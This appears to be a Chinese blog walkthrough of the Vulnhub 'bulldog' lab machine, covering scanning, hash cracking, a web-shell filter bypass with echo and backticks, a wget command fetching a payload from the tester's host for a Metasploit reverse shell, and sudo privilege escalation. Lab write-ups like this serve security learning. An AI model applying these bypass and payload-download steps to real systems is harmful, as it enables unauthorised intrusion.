当前位置: 首页 > news >正文

vulnhub渗透日记23:bulldog

声明

文中涉及操作均来自靶机虚拟环境,禁止用于真实环境,任何未经授权的渗透测试都是违法行为!

开搞

首先nmap扫描目标机开放端口和服务

在这里插入图片描述

访问80端口

在这里插入图片描述

扫目录撒

在这里插入图片描述

发现登录口

在这里插入图片描述
在这里插入图片描述
点击web-shell提示登录后才能使用

在这里插入图片描述

/dev/下面查看网页源码发现村咋hash值

在这里插入图片描述

awk提取hash

把那堆复制到1.txt中提取
在这里插入图片描述

在线解密

https://crackstation.net/
在这里插入图片描述

nick/bulldog登录

在这里插入图片描述

进入web-shell

可以执行命令
在这里插入图片描述
但是很多命令不让用
在这里插入图片描述
可以用echo `curl` 的方法绕过限制
在这里插入图片描述

创建反弹shell

python起个服务

在这里插入图片描述

wget下载到目标

echo `wget http://192.168.2.129:5555/5555.elf`

在这里插入图片描述

msf建立监听

在这里插入图片描述

给5555.elf添加执行权限并执行

在这里插入图片描述

拿到shell

在这里插入图片描述

进入shell

在这里插入图片描述

查看家目录有啥

在这里插入图片描述

查看hiddenadmindirectory

查看note
在这里插入图片描述

密码藏在customPermissionApp

SUPERultimatePASSWORDyouCANTget
在这里插入图片描述

结束

因为这个文件是bulldogadmin的文件,我的身份是django,所以需要sudo 去给他加执行权限,sudo chmod 777 customPermissionApp就要用到django的密码
执行后变成了root权限
靶标一般就在root目录下
在这里插入图片描述

相关文章:

  • SQLite Having 子句详解
  • java基础100道面试题
  • AT32F421专题---PA9 PA10的I2C1连接AT24C02失败及解决
  • Diffusion模型中时间t嵌入的方法
  • Teaching Small Language Models Reasoning throughCounterfactual Distillation
  • Hive-07之企业级调优
  • Docker部署MySQL
  • Python:简单的爬虫程序,从web页面爬取图片与标题并保存MySQL
  • 大模型核心要素完全解析:从数字神经元到智能对话的奥秘
  • go语言数据类型
  • (50)[HGAME 2023 week2]before_main
  • AutoGen学习笔记系列(六)Tutorial - Termination
  • unittest框架 核心知识的系统复习及与pytest的对比
  • uniapp x 学习之 uts 语言快速入门
  • 【Embedding】何为Embedding?
  • 筑牢网络安全防线:守护您的数据安全
  • 单体架构、集群、分布式、微服务的区别!
  • Redis设计与实现-数据结构
  • Selenium遇到Exception自动截图
  • 【大模型学习】第八章 深入理解机器学习技术细节
  • 临港新片区将新设5亿元启航基金:专门投向在临港发展的种子期、初创型企业
  • 国税总局上海市税务局回应刘晓庆被举报涉嫌偷漏税:正依法依规办理
  • 商务部回应稀土出口管制问题
  • 奥运“四朝元老”华天回国参赛,伤势未愈谨慎出战全国锦标赛
  • 娃哈哈:自4月起已终止与今麦郎的委托代工关系,未来将坚持自有生产模式
  • 陈吉宁龚正黄莉新胡文容等在警示教育基地参观学习,出席深入贯彻中央八项规定精神学习教育交流会